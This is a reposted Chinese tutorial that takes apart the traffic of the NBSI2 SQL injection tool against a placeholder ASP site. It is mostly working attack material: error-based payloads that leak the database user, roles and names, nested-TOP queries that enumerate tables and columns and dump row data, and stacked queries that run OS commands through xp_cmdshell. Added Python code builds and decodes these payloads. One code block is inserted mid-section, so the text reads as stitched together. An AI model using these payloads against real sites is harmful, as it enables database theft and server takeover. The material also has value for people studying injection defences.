NBSI2 Internals Revealed

2024-07-21 02:06:31
Source: reprint
Contributed by: netizen


SQL injection has been all the rage for a while. Anyone who has used Xiaozhu's (小竹) NB2 knows the tool is close to unbeatable: a newbie can own a site with it in seconds. But if you never learn what actually happens during the injection, you will never get any better.


First, a disclaimer: I am only a newbie myself. I happened to be studying SQL recently, so I took NB2's injection process apart. The tool I used is WSE, which most people will know; it is available all over the web, for example at http://www.gxgl.com/soft/wse06b1.zip. WSE monitors and modifies the data a program sends and receives over the network, which makes it handy for debugging network applications, and here for seeing exactly what NB2 sends.


Enough talk, let's get to work. First pick a site with a SQL injection vulnerability, www.testdb.net, and find an injection point: http://www.testdb.net/article_read.asp?id=80

Naturally, www.testdb.net does not exist; the host name is a placeholder.


Process 1: Obtain SQL Server database information

Open NB2, enter the URL http://www.testdb.net/article_read.asp?id=80, select the "GET" method and click the "Detect" button.
NB2 reports the following about the SQL Server database:

Multi-statement execution: unknown
Subqueries: supported
Current user: test
User privileges: db_owner
Current database: testdb

Anyone who has used NB2 will recognise this output. What follows is the traffic behind each of those lines.

URL-encoding reminder: %20 decodes to a space, %2b to +, and %25 to %.


http/1.1 200 ok                       // the request succeeded: the injected condition was true, or did not break the query
http/1.1 500 internal server error    // the query raised an error; the ASP 500 page carries the SQL Server error text, which is what NB2 reads

The GET requests captured with WSE, in order:

get /article_read.asp?id=80 http/1.1
// baseline request, so NB2 knows what a normal page looks like

get /article_read.asp?id=80%20and%20user%2bchar(124)=0 http/1.1
i.e. article_read.asp?id=80 and user+char(124)=0
    char(124) is the character '|'

get /article_read.asp?id=80;declare%20@a%20int-- http/1.1
i.e. article_read.asp?id=80;declare @a int--
// tests whether stacked (multi-statement) queries are possible; the articleid cookie in the next capture confirms the payload as declare @a int--

get /article_read.asp?id=80%20and%20(select%20count(1)%20from%20[sysobjects])>=0 http/1.1
accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
user-agent: microsoft url control - 6.00.8862
host: www.testdb.net
connection: keep-alive
cache-control: no-cache
cookie: articleid=80%3bdeclare+%40a+int%2d%2d; aspsessionidsstcttqd=ellnneidceeanbmokamgjged

i.e. article_read.asp?id=80 and (select count(1) from [sysobjects])>=0
// tests whether subqueries are possible (and, implicitly, that sysobjects is readable)

get /article_read.asp?id=80%20and%20user%2bchar(124)=0 http/1.1
accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
user-agent: microsoft url control - 6.00.8862
host: www.testdb.net
connection: keep-alive
cache-control: no-cache
cookie: articleid=80+and+%28select+count%281%29+from+%5bsysobjects%5d%29%3e%3d0; aspsessionidsstcttqd=ellnneidceeanbmokamgjged

i.e. article_read.asp?id=80 and user+char(124)=0
// obtains the current user
(Note the cookie header: article_read.asp stores the id value in an articleid cookie, so every captured request carries the previous request's payload. That is a quirk of the target rather than of NB2, but it is a handy cross-check when reading the capture.)

user is a SQL Server built-in (niladic) function rather than a variable; it returns the user name of the current connection as nvarchar. Comparing an nvarchar value with the integer 0 makes SQL Server first try to convert the nvarchar value to int, and that conversion fails. The error SQL Server raises reads (Chinese build): 將 nvarchar 值 'east_asp' 轉換為數據類型為 int 的列時發生語法錯誤, i.e. "Syntax error converting the nvarchar value 'east_asp' to a column of data type int". east_asp is the value of user, so the database user name is obtained without any effort. (The user name in this sample message differs from the "test" reported in the detection output above; the error text is illustrative.) The plain form and user>0 leaks it the same way and quotes 'east_asp'; with NB2's form the message quotes 'east_asp|'.

Why the +char(124)? Two reasons. If the value happened to consist only of digits, say '1', the conversion to int would succeed and no error would leak anything; appending '|' guarantees the string can never be converted. And the trailing '|' inside the quoted value gives NB2 an unambiguous end marker when it parses the value out of the error page.


get /article_read.asp?id=80%20and%20cast(is_srvrolemember(0x730079007300610064006d0069006e00)%20as%20varchar(1))%2bchar(124)=1 http/1.1
accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
user-agent: microsoft url control - 6.00.8862
host: www.testdb.net
connection: keep-alive
cache-control: no-cache
cookie: articleid=80+and+%28select+count%281%29+from+%5bsysobjects%5d%29%3e%3d0; aspsessionidsstcttqd=ellnneidceeanbmokamgjged

i.e. article_read.asp?id=80 and cast(is_srvrolemember(0x730079007300610064006d0069006e00) as varchar(1))+char(124)=1

Function notes:

is_srvrolemember indicates whether the current login is a member of the specified server role.

Syntax
is_srvrolemember ( 'role' [ , 'login' ] )

Arguments
'role' is the name of the server role being checked. role is of type sysname.
 Valid values for role are: sysadmin, dbcreator, diskadmin, processadmin, serveradmin, setupadmin, securityadmin

'login'

The optional name of the login to check. login is of type sysname and defaults to null. When it is not specified, the login of the current user is used.

The hex literal 0x730079007300610064006d0069006e00 is the string 'sysadmin' written as a Unicode byte string (UTF-16LE, the encoding SQL Server uses for nvarchar): 73 00 = s, 79 00 = y, 73 00 = s, 61 00 = a, 64 00 = d, 6d 00 = m, 69 00 = i, 6e 00 = n. SQL Server implicitly converts the binary literal to nvarchar, so this is the same as is_srvrolemember('sysadmin') but needs no quote characters in the URL, which matters when single quotes are filtered or escaped.

select cast(is_srvrolemember(0x730079007300610064006d0069006e00) as varchar(1))+char(124) returns "1|" when the login is a sysadmin member and "0|" otherwise; either way the comparison with the integer 1 fails to convert and the error message leaks the digit. On the testdb target it came back "0|", consistent with the detection output above, which reports db_owner rather than sysadmin.


get /article_read.asp?id=80%20and%20cast(is_member(0x640062005f006f0077006e0065007200)%20as%20varchar(1))%2bchar(124)=1 http/1.1
accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
user-agent: microsoft url control - 6.00.8862
host: www.testdb.net
connection: keep-alive
cache-control: no-cache
cookie: articleid=80+and+%28select+count%281%29+from+%5bsysobjects%5d%29%3e%3d0; aspsessionidsstcttqd=ellnneidceeanbmokamgjged

i.e. article_read.asp?id=80 and cast(is_member(0x640062005f006f0077006e0065007200) as varchar(1))+char(124)=1

select cast(is_member(0x640062005f006f0077006e0065007200) as varchar(1))+char(124) has the same shape as the previous probe, but the hex literal is different. Decoded the same way (two bytes per character, the second one 00), 0x640062005f006f0077006e0065007200 is 'db_owner': 64 00 = d, 62 00 = b, 5f 00 = _, 6f 00 = o, 77 00 = w, 6e 00 = n, 65 00 = e, 72 00 = r. So this is is_member('db_owner'): it checks whether the current user is a member of the db_owner fixed database role in the current database, and here it returns "1|", which is where the "User privileges: db_owner" line of the detection output comes from. NB2 tests the server-level sysadmin role first and then falls back to the database-level db_owner role.


get /article_read.asp?id=80%20and%20db_name()%2bchar(124)=0 http/1.1
accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
user-agent: microsoft url control - 6.00.8862
host: www.testdb.net
connection: keep-alive
cache-control: no-cache
cookie: articleid=80+and+%28select+count%281%29+from+%5bsysobjects%5d%29%3e%3d0; aspsessionidsstcttqd=ellnneidceeanbmokamgjged

i.e. article_read.asp?id=80 and db_name()+char(124)=0
This one uses db_name(), a built-in function that returns the name of the current database; the same conversion error leaks it as "testdb|".

That completes the analysis of how the SQL Server information is gathered.

Note: the POST method is not analysed in detail; you can look at it yourself. Below are the request bodies captured when using POST. They work exactly like the GET ones; the interesting part is the last line of each request. They also show a few tricks worth knowing: the same probe is tried for three injection contexts, a numeric parameter (no quotes), a quoted string parameter (closed with ' and re-balanced with and ''=') and a LIKE pattern (closed with %' and re-balanced with and '%'='); and the 1=1 / 1=2 pairs are a blind true/false test for targets that return no error text:

id=80%20and%20user%2bchar(124)=0
id=80'%20and%20user%2bchar(124)=0%20and%20''='
id=80%25'%20and%20user%2bchar(124)=0%20and%20'%25'='
id=80%20and%201=1
id=80%20and%201=2
id=80'%20and%201=1%20and%20''='
id=80'%20and%201=2%20and%20''='
id=80%25'%20and%201=1%20and%20'%25'='
id=80%25'%20and%201=2%20and%20'%25'='
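The Process 1 fingerprinting above, reproduced as an added example that is not part of the original article and not NB2's own code. It URL-decodes the captured id= values back into SQL, classifies each one as the check it performs, and pulls the leaked value out of a SQL Server conversion error using the trailing '|' as the end marker. The probe strings are reconstructed from the capture; the error texts and page bodies are constructed samples (English and Chinese builds, formats assumed), and the way a 200 or 500 is turned into "supported"/"unsupported" is this example's own rule, not NB2's.

```python
import re
from urllib.parse import unquote

# Probes NB2 sent during Process 1, as captured (id= values only).
CAPTURED_PROBES = [
    "id=80",
    "id=80%20and%20user%2bchar(124)=0",
    "id=80;declare%20@a%20int--",
    "id=80%20and%20(select%20count(1)%20from%20[sysobjects])>=0",
    "id=80%20and%20cast(is_srvrolemember(0x730079007300610064006d0069006e00)%20as%20varchar(1))%2bchar(124)=1",
    "id=80%20and%20db_name()%2bchar(124)=0",
]

# What each probe tests, matched against the URL-decoded SQL fragment.
CHECKS = [
    ("multi-statement", re.compile(r";\s*declare\s+@\w+\s+int\s*--", re.I)),
    ("subquery", re.compile(r"\(select\s+count\(1\)\s+from\s+\[sysobjects\]\)\s*>=\s*0", re.I)),
    ("current user", re.compile(r"\band\s+user\s*\+\s*char\(124\)\s*=\s*0", re.I)),
    ("server role", re.compile(r"is_srvrolemember\s*\(", re.I)),
    ("current database", re.compile(r"\bdb_name\(\)\s*\+\s*char\(124\)\s*=\s*0", re.I)),
]

# SQL Server 2000 conversion errors as they appear in an ASP 500 page.
# Assumed formats for the English and the Chinese build of SQL Server.
ERROR_PATTERNS = [
    re.compile(r"converting the n?varchar value '([^']*)' to a column of data type int", re.I),
    re.compile(r"n?varchar 值 '([^']*)' 转换", re.I),
]


def decode_probe(query_string):
    """Return (decoded SQL fragment, check name) for one captured id= value."""
    sql = unquote(query_string.split("=", 1)[1])   # %20 -> ' ', %2b -> '+'
    for name, pattern in CHECKS:
        if pattern.search(sql):
            return sql, name
    return sql, "baseline"


def extract_leaked_value(error_text):
    """Pull the injected expression's value out of a conversion error.

    The value NB2 injects always ends in char(124) = '|'. The marker guarantees
    the conversion fails even for an all-digit value such as '1', and its
    presence tells us the value was captured whole. Returns None if no error matched.
    """
    for pattern in ERROR_PATTERNS:
        match = pattern.search(error_text)
        if match:
            value = match.group(1)
            return value[:-1] if value.endswith("|") else value
    return None


def summarize(responses):
    """Turn (query_string, status, body) triples into NB2-style detection output.

    Leaked values come from the 500 page; for the two structural checks a 200
    means the injected syntax was accepted (this example's rule, assumed).
    """
    report = {}
    for query_string, status, body in responses:
        _, check = decode_probe(query_string)
        if check == "baseline":
            continue
        if check in ("multi-statement", "subquery"):
            report[check] = "supported" if status == 200 else "unsupported"
        elif check == "server role":
            report[check] = "sysadmin" if extract_leaked_value(body) == "1" else "not sysadmin"
        else:
            report[check] = extract_leaked_value(body)
    return report


# Constructed responses for the probes above (testdb is the page's placeholder).
SAMPLE_RESPONSES = [
    (CAPTURED_PROBES[0], 200, "<html>article 80</html>"),
    (CAPTURED_PROBES[1], 500, "Syntax error converting the nvarchar value 'test|' to a column of data type int."),
    (CAPTURED_PROBES[2], 200, "<html>article 80</html>"),
    (CAPTURED_PROBES[3], 200, "<html>article 80</html>"),
    (CAPTURED_PROBES[4], 500, "Syntax error converting the varchar value '0|' to a column of data type int."),
    (CAPTURED_PROBES[5], 500, "将 nvarchar 值 'testdb|' 转换为数据类型为 int 的列时发生语法错误。"),
]

if __name__ == "__main__":
    for item in summarize(SAMPLE_RESPONSES).items():
        print("%s: %s" % item)
```

Run stand-alone it prints a report in the shape of NB2's detection box; the only part that depends on the target is ERROR_PATTERNS, which has to match the language of the SQL Server build and whether the ASP page exposes detailed errors at all.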

//////////////////////////////////////////////

Process 2: Guessing table names

top 1

get /article_read.asp?id=80%20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from(select%20top%201%20id,name%20from%20[testdb]..[sysobjects]%20where%20xtype=char(85)%20order%20by%20id)%20t%20order%20by%20id%20desc)>0 http/1.1

i.e. article_read.asp?id=80 and (select top 1 cast(name as varchar(8000)) from(select top 1 id,name from
    [testdb]..[sysobjects] where xtype=char(85) order by id) t order by id desc)>0
    char(85)='U', the xtype of a user table in sysobjects

This retrieves the name of the first user table in the testdb database. The inner query takes the first n tables ordered by id, and the outer query takes the last of those by ordering the same set descending, so top n in the inner query yields table number n. SQL Server 2000 has no OFFSET clause, and this nested-TOP trick is how NB2 walks a result set one row at a time. The name is cast to varchar(8000) and compared with 0 so that, as before, the conversion error leaks it. Increasing top n retrieves the other table names.


top 2

get /article_read.asp?id=80%20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from(select%20top%202%20id,name%20from%20[testdb]..[sysobjects]%20where%20xtype=char(85)%20order%20by%20id)%20t%20order%20by%20id%20desc)>0 http/1.1

...

top n


Packet captured by WSE:

get /article_read.asp?id=80%20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from(select%20top%201%20id,name%20from%20[testdb]..[sysobjects]%20where%20xtype=char(85)%20order%20by%20id)%20t%20order%20by%20id%20desc)>0 http/1.1
accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
user-agent: microsoft url control - 6.00.8862
host: www.testdb.net
connection: keep-alive
cache-control: no-cache
cookie: aspsessionidsstcttqd=ellnneidceeanbmokamgjged; articleid=80+and+%28select+count%281%29+from+%5bsysobjects%5d%29%3e%3d0

...........

//////////////////////////////////////////////

Process 3: Guessing column names from a table name
Table name: article

top 1

get /article_read.asp?id=80%20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%201%20colid,name%20from%20[testdb]..[syscolumns]%20where%20id%20=%20object_id(nchar(101)%2bnchar(97)%2bnchar(115)%2bnchar(116)%2bnchar(104)%2bnchar(111)%2bnchar(116)%2bnchar(46)%2bnchar(46)%2bnchar(65)%2bnchar(82)%2bnchar(84)%2bnchar(73)%2bnchar(67)%2bnchar(76)%2bnchar(69))%20order%20by%20colid)%20t%20order%20by%20colid%20desc)>0 http/1.1

i.e. article_read.asp?id=80 and (select top 1 cast(name as varchar(8000)) from (select top 1 colid,name from
    [testdb]..[syscolumns] where id = object_id(nchar(101)+nchar(97)+nchar(115)+nchar(116)+nchar(104)+nchar(111)+
    nchar(116)+nchar(46)+nchar(46)+nchar(65)+nchar(82)+nchar(84)+nchar(73)+nchar(67)+nchar(76)+nchar(69))
    order by colid) t order by colid desc)>0

This retrieves the name of the first column of the article table, using the same nested-TOP trick as Process 2, this time over syscolumns ordered by colid. Increasing top n retrieves the other column names.

Function notes:

object_id returns the database object identification number.

Syntax: object_id ( 'object' )

Argument  'object'
The object to use. object is of type char or nchar. If object is of type char, it is implicitly converted to nchar.

Return type: int


nchar(101)+nchar(97)+nchar(115)+nchar(116)+nchar(104)+nchar(111)+nchar(116)+nchar(46)+
nchar(46)+nchar(65)+nchar(82)+nchar(84)+nchar(73)+nchar(67)+nchar(76)+nchar(69)

is a string built character by character from Unicode code points, so that the object name needs no quote characters in the URL (101 = e, 97 = a, 115 = s, 116 = t, 104 = h, 111 = o, 46 = '.', 65 = A, 82 = R, 84 = T, 73 = I, 67 = C, 76 = L, 69 = E). Decoded literally it reads easthot..ARTICLE, presumably left over from the real site this capture was taken from; in the anonymised testdb example it corresponds to testdb..article. The three-part name resolves because the owner part between the two dots may be omitted, and the case does not matter under SQL Server's default case-insensitive collation.

In other words:
article_read.asp?id=80 and (select top 1 cast(name as varchar(8000)) from (select top 1 colid,name from
      [testdb]..[syscolumns] where id = object_id('testdb..article')
      order by colid) t order by colid desc)>0
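The two quote-free string encodings seen in this article, the hex literal passed to is_srvrolemember and is_member in Process 1 and the nchar() chain passed to object_id here in Process 3, as an added example that is not code from the article or from NB2. It encodes and decodes both forms and checks them against the constants captured on this page; the helper names are the example's own.

```python
import re

# Hex literals captured in Process 1 and the nchar() chain captured in Process 3.
SYSADMIN_HEX = "0x730079007300610064006d0069006e00"
DB_OWNER_HEX = "0x640062005f006f0077006e0065007200"
OBJECT_NAME_CHAIN = ("nchar(101)+nchar(97)+nchar(115)+nchar(116)+nchar(104)+nchar(111)+nchar(116)"
                     "+nchar(46)+nchar(46)+nchar(65)+nchar(82)+nchar(84)+nchar(73)+nchar(67)"
                     "+nchar(76)+nchar(69)")

CHAR_CALL = re.compile(r"\bn?char\((\d+)\)", re.I)


def nvarchar_hex(text):
    """Encode text as SQL Server stores nvarchar (UTF-16LE) and write it as a 0x literal.

    Passed where a string is expected, the binary literal is implicitly
    converted to nvarchar, so no quote characters are needed in the URL.
    """
    return "0x" + text.encode("utf-16-le").hex()


def decode_nvarchar_hex(literal):
    """Reverse of nvarchar_hex: read a 0x literal back as text."""
    body = literal[2:] if literal[:2].lower() == "0x" else literal
    return bytes.fromhex(body).decode("utf-16-le")


def char_chain(text, as_nchar=True):
    """Build nchar(n)+nchar(n)+... (or char(n)+...) for a string, as NB2 does for object_id()."""
    func = "nchar" if as_nchar else "char"
    return "+".join("%s(%d)" % (func, ord(c)) for c in text)


def decode_char_chain(expression):
    """Turn every char(n)/nchar(n) call in a T-SQL expression back into its character."""
    return "".join(chr(int(code)) for code in CHAR_CALL.findall(expression))


if __name__ == "__main__":
    print(decode_nvarchar_hex(SYSADMIN_HEX), decode_nvarchar_hex(DB_OWNER_HEX))
    print(decode_char_chain(OBJECT_NAME_CHAIN))
    print(char_chain("testdb..article"))
```

The hex form is the compact one (one literal, no + operators) and is what NB2 uses for short fixed strings such as role names; the nchar() chain is longer but survives filters that reject 0x literals, and it is what NB2 uses for the object name it has to build from guessed input.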


top 2

get /article_read.asp?id=80%20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%202%20colid,name%20from%20[testdb]..[syscolumns]%20where%20id%20=%20object_id(nchar(101)%2bnchar(97)%2bnchar(115)%2bnchar(116)%2bnchar(104)%2bnchar(111)%2bnchar(116)%2bnchar(46)%2bnchar(46)%2bnchar(65)%2bnchar(82)%2bnchar(84)%2bnchar(73)%2bnchar(67)%2bnchar(76)%2bnchar(69))%20order%20by%20colid)%20t%20order%20by%20colid%20desc)>0 http/1.1


top n

...


Packet captured by WSE:

get /article_read.asp?id=80%20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%201%20colid,name%20from%20[testdb]..[syscolumns]%20where%20id%20=%20object_id(nchar(101)%2bnchar(97)%2bnchar(115)%2bnchar(116)%2bnchar(104)%2bnchar(111)%2bnchar(116)%2bnchar(46)%2bnchar(46)%2bnchar(65)%2bnchar(82)%2bnchar(84)%2bnchar(73)%2bnchar(67)%2bnchar(76)%2bnchar(69))%20order%20by%20colid)%20t%20order%20by%20colid%20desc)>0 http/1.1
accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
user-agent: microsoft url control - 6.00.8862
host: www.testdb.net
connection: keep-alive
cache-control: no-cache
cookie: aspsessionidsstcttqd=ellnneidceeanbmokamgjged; articleid=80+and+%28select+count%281%29+from+%5bsysobjects%5d%29%3e%3d0

...............

//////////////////////////////////////////////

Process 4: Guessing field contents from a column name

Column name: title

top 1

get /article_read.asp?id=80%20and%20(select%20top%201%20isnull(cast([title]%20as%20varchar(8000)),char(32))%2bchar(124)%20from%20(select%20top%201%20[title]%20from%20[testdb]..[article]%20where%201=1%20order%20by%20[title])%20t%20order%20by%20[title]%20desc)>0 http/1.1


i.e. article_read.asp?id=80 and (select top 1 isnull(cast([title] as varchar(8000)),char(32))+char(124)
    from (select top 1 [title] from [testdb]..[article] where 1=1 order by [title]) t order by [title] desc)>0

This retrieves the value of the title column in the first row, first in title order rather than table order, because the nested TOP needs an order by and NB2 orders by the column being read. isnull(..., char(32)) replaces a NULL with a space so that the concatenation with char(124) does not itself become NULL (which would compare as unknown and raise no error at all). Increasing top n retrieves the other rows.

top 2

get /article_read.asp?id=80%20and%20(select%20top%201%20isnull(cast([title]%20as%20varchar(8000)),char(32))%2bchar(124)%20from%20(select%20top%202%20[title]%20from%20[testdb]..[article]%20where%201=1%20order%20by%20[title])%20t%20order%20by%20[title]%20desc)>0 http/1.1


top n

...


Packets captured by WSE:


// get the row count of the article table; NB2 needs it because past the last row the nested TOP keeps returning the last row instead of NULL, so the count is the only reliable stop condition
get /article_read.asp?id=80%20and%20(select%20cast(count(1)%20as%20varchar(8000))%2bchar(124)%20from%20[testdb]..[article]%20where%201=1)>0 http/1.1
accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
user-agent: microsoft url control - 6.00.8862
host: www.testdb.net
connection: keep-alive
cache-control: no-cache
cookie: aspsessionidsstcttqd=ellnneidceeanbmokamgjged; articleid=80+and+%28select+count%281%29+from+%5bsysobjects%5d%29%3e%3d0

// get the first record of the title column of the article table

get /article_read.asp?id=80%20and%20(select%20top%201%20isnull(cast([title]%20as%20varchar(8000)),char(32))%2bchar(124)%20from%20(select%20top%201%20[title]%20from%20[testdb]..[article]%20where%201=1%20order%20by%20[title])%20t%20order%20by%20[title]%20desc)>0 http/1.1
accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
user-agent: microsoft url control - 6.00.8862
host: www.testdb.net
connection: keep-alive
cache-control: no-cache
cookie: aspsessionidsstcttqd=ellnneidceeanbmokamgjged; articleid=80+and+%28select+count%281%29+from+%5bsysobjects%5d%29%3e%3d0

...............

//////////////////////////////////////////////

That completes the analysis of table names, column names and field contents. Now for the other main functions.


Process 5: Executing DOS commands and SQL statements

Executing the DOS command dir c:\


////////////////////////////////////////////////
Capture analysis, with the output echoed back:
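The nested-TOP row walk that Processes 2, 3 and 4 all rely on, as an added example that is not the article's or NB2's code. It builds the three payload shapes exactly as captured above, models the nested TOP semantics over constructed in-memory data so that the behaviour past the last row is visible, and shows why the row count is fetched first. The catalog rows and titles are constructed, and the function names are the example's own.

```python
# Constructed stand-ins for the catalog and for the table being read.
SYSOBJECTS_USER_TABLES = [(5, "article"), (21, "users"), (37, "admin")]   # (id, name)
ARTICLE_TITLES = ["Hello", "SQL notes", "Welcome", "Welcome"]             # duplicate on purpose


def table_name_payload(n, db):
    """Process 2: name of user table number n (xtype 'U'), ordered by id."""
    return ("(select top 1 cast(name as varchar(8000)) from (select top %d id,name "
            "from [%s]..[sysobjects] where xtype=char(85) order by id) t order by id desc)>0" % (n, db))


def column_name_payload(n, db, object_expr):
    """Process 3: name of column number n of the object named by object_expr (e.g. an nchar() chain)."""
    return ("(select top 1 cast(name as varchar(8000)) from (select top %d colid,name "
            "from [%s]..[syscolumns] where id = object_id(%s) order by colid) t order by colid desc)>0"
            % (n, db, object_expr))


def row_value_payload(n, db, table, column):
    """Process 4: value of column in row n, in column order; NULL becomes a space."""
    return ("(select top 1 isnull(cast([%s] as varchar(8000)),char(32))+char(124) "
            "from (select top %d [%s] from [%s]..[%s] where 1=1 order by [%s]) t order by [%s] desc)>0"
            % (column, n, column, db, table, column, column))


def row_count_payload(db, table):
    """Process 4: row count, sent before the rows so the walk knows where to stop."""
    return "(select cast(count(1) as varchar(8000))+char(124) from [%s]..[%s] where 1=1)>0" % (db, table)


def nested_top(rows, n, key):
    """Model of 'select top 1 ... from (select top n ... order by key) t order by key desc'.

    Returns row n in key order. Past the last row the inner TOP returns all rows
    and the outer TOP 1 returns the last one again; it never becomes NULL, so a
    caller cannot use NULL as the stop signal. Python sorts by code point while a
    real server sorts by collation, so the order of the walk can differ.
    """
    first_n = sorted(rows, key=key)[:n]
    return first_n[-1] if first_n else None


def walk(oracle, count=None, limit=500):
    """Call oracle(n) for n = 1, 2, ... and collect the values.

    With count (the count(1) result) the walk stops exactly there. Without it
    the only stop signal is a repeated value, which also stops early on a
    genuine duplicate in the data.
    """
    values = []
    for n in range(1, (count if count is not None else limit) + 1):
        value = oracle(n)
        if value is None or (count is None and values and value == values[-1]):
            break
        values.append(value)
    return values


def table_oracle(n):
    """Simulated target answering the Process 2 payload for row n."""
    row = nested_top(SYSOBJECTS_USER_TABLES, n, key=lambda r: r[0])
    return row[1] if row else None


def title_oracle(n):
    """Simulated target answering the Process 4 payload for row n."""
    return nested_top(ARTICLE_TITLES, n, key=lambda s: s)


if __name__ == "__main__":
    print(table_name_payload(1, "testdb"))
    print(walk(table_oracle))                           # ['article', 'users', 'admin']
    print(walk(title_oracle))                           # stops early on the duplicate title
    print(walk(title_oracle, count=len(ARTICLE_TITLES)))
```

Against a live target the oracle would send the payload and parse the conversion error; everything else, including the stop condition, is the same, which is why NB2 issues the count(1) query before reading rows but not before reading sysobjects, where object ids are unique and a repeat is a safe stop signal.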

get /article_read.asp?id=80%20and%20db_name()%2bchar(124)=0 http/1.1
accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
user-agent: microsoft url control - 6.00.8862
host: www.testdb.net
connection: keep-alive
cache-control: no-cache
cookie: aspsessionidsstcttqd=ellnneidceeanbmokamgjged; articleid=80+and+%28select+count%281%29+from+%5bsysobjects%5d%29%3e%3d0

// NB2 re-reads db_name() first, presumably because the current database name is needed for the three-part [testdb]..[nb_commander_tmp] name in the next request


get /article_read.asp?id=80;exec%20master..xp_cmdshell%20'dir%20c:\%20>%20c:\nb_commander_txt.log';drop%20table%20nb_commander_tmp;create%20table%20nb_commander_tmp(resulttxt%20varchar(7996)%20null);bulk%20insert%20[testdb]..[nb_commander_tmp]%20from%20'c:\nb_commander_txt.log'%20with%20(keepnulls);alter%20table%20nb_commander_tmp%20add%20id%20int%20not%20null%20identity%20(1,1)-- http/1.1
accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
user-agent: microsoft url control - 6.00.8862
host: www.testdb.net
connection: keep-alive
cache-control: no-cache
cookie: aspsessionidsstcttqd=ellnneidceeanbmokamgjged; articleid=80+and+%28select+count%281%29+from+%5bsysobjects%5d%29%3e%3d0

The important part is this:

article_read.asp?id=80;exec master..xp_cmdshell 'dir c:\ > c:\nb_commander_txt.log';
                       drop table nb_commander_tmp;create table nb_commander_tmp(resulttxt varchar(7996) null);
                       bulk insert [testdb]..[nb_commander_tmp] from 'c:\nb_commander_txt.log' with (keepnulls);
                       alter table nb_commander_tmp add id int not null identity (1,1)--

(The cookie in the next capture shows the path encoded as c%3a%5c..., i.e. c:\ with a backslash.)

bulk insert copies a data file into a database table or view in a user-specified format.
keepnulls specifies that empty columns keep a null value during the bulk copy instead of receiving default values for the inserted columns.
See the T-SQL reference for the full details.

What the batch does: run the DOS command dir c:\ through xp_cmdshell and redirect its output to the file nb_commander_txt.log, load that file line by line into a freshly created scratch table nb_commander_tmp (one varchar(7996) column), and finally add an auto-incrementing id column so that the lines can be read back one at a time by number. Three things have to hold for this to work: stacked queries must be accepted (the "Multi-statement execution" check from Process 1), the login must be allowed to run xp_cmdshell (members of sysadmin only on SQL Server 2000, unless a proxy account is configured) and bulk insert (sysadmin or bulkadmin), and the SQL Server service account must be able to write to and read from c:\.


id=1

get /article_read.asp?id=80%20and%20(select%20top%201%20case%20when%20resulttxt%20is%20null%20then%20'|'%20else%20resulttxt%2b'|'%20end%20from%20nb_commander_tmp%20where%20id=1)=0 http/1.1
accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
user-agent: microsoft url control - 6.00.8862
host: www.testdb.net
connection: keep-alive
cache-control: no-cache
cookie: aspsessionidsstcttqd=ellnneidceeanbmokamgjged; articleid=80%3bexec+master%2e%2exp%5fcmdshell+%27dir+c%3a%5c+%3e+c%3a%5cnb%5fcommander%5ftxt%2elog%27%3bdrop+table+nb%5fcommander%5ftmp%3bcreate+table+nb%5fcommander%5ftmp%28resulttxt+varchar%287996%29+null%29%3bbulk+insert+%5btestdb%5d%2e%2e%5bnb%5fcommander%5ftmp%5d+from+%27c%3a%5cnb%5fcommander%5ftxt%2elog%27+with+%28keepnulls%29%3balter+table+nb%5fcommander%5ftmp+add+id+int+not+null+identity+%281%2c1%29%2d%2d

i.e. article_read.asp?id=80 and (select top 1 case when resulttxt is null then '|' else resulttxt+'|' end
                                from nb_commander_tmp where id=1)=0

This reads back the first line of output; the case expression turns a NULL line into a bare '|' rather than NULL, so that a blank line in the dir listing still produces a conversion error and NB2 can tell it apart from a missing row. The same request with id=2, 3, ... n reads back every line.


id=2

get /article_read.asp?id=80%20and%20(select%20top%201%20case%20when%20resulttxt%20is%20null%20then%20'|'%20else%20resulttxt%2b'|'%20end%20from%20nb_commander_tmp%20where%20id=2)=0 http/1.1
accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
user-agent: microsoft url control - 6.00.8862
host: www.testdb.net
connection: keep-alive
cache-control: no-cache
cookie: aspsessionidsstcttqd=ellnneidceeanbmokamgjged; articleid=80%3bexec+master%2e%2exp%5fcmdshell+%27dir+c%3a%5c+%3e+c%3a%5cnb%5fcommander%5ftxt%2elog%27%3bdrop+table+nb%5fcommander%5ftmp%3bcreate+table+nb%5fcommander%5ftmp%28resulttxt+varchar%287996%29+null%29%3bbulk+insert+%5btestdb%5d%2e%2e%5bnb%5fcommander%5ftmp%5d+from+%27c%3a%5cnb%5fcommander%5ftxt%2elog%27+with+%28keepnulls%29%3balter+table+nb%5fcommander%5ftmp+add+id+int+not+null+identity+%281%2c1%29%2d%2d

id=n

...............


Output shown:
[Unexpected output]
[Unexpected output]
[Unexpected output]
[Unexpected output]
...
...
...

If everything works, this lists every file under c:\. The message above means the lines could not be read back. One possible reason is that the scratch table nb_commander_tmp was never created. Given that Process 1 reported the login as db_owner and not sysadmin, a likelier one is that the batch failed earlier: on SQL Server 2000 xp_cmdshell can only be executed by sysadmin members (unless a proxy account is configured) and bulk insert by sysadmin or bulkadmin members, so neither the log file nor its import would have succeeded.
////////////////////////////////////////////////

Capture analysis, without echo:
DOS command dir c:\

get /article_read.asp?id=80;exec%20master..xp_cmdshell%20'dir%20c:\'-- http/1.1
accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
user-agent: microsoft url control - 6.00.8862
host: www.testdb.net
connection: keep-alive
cache-control: no-cache
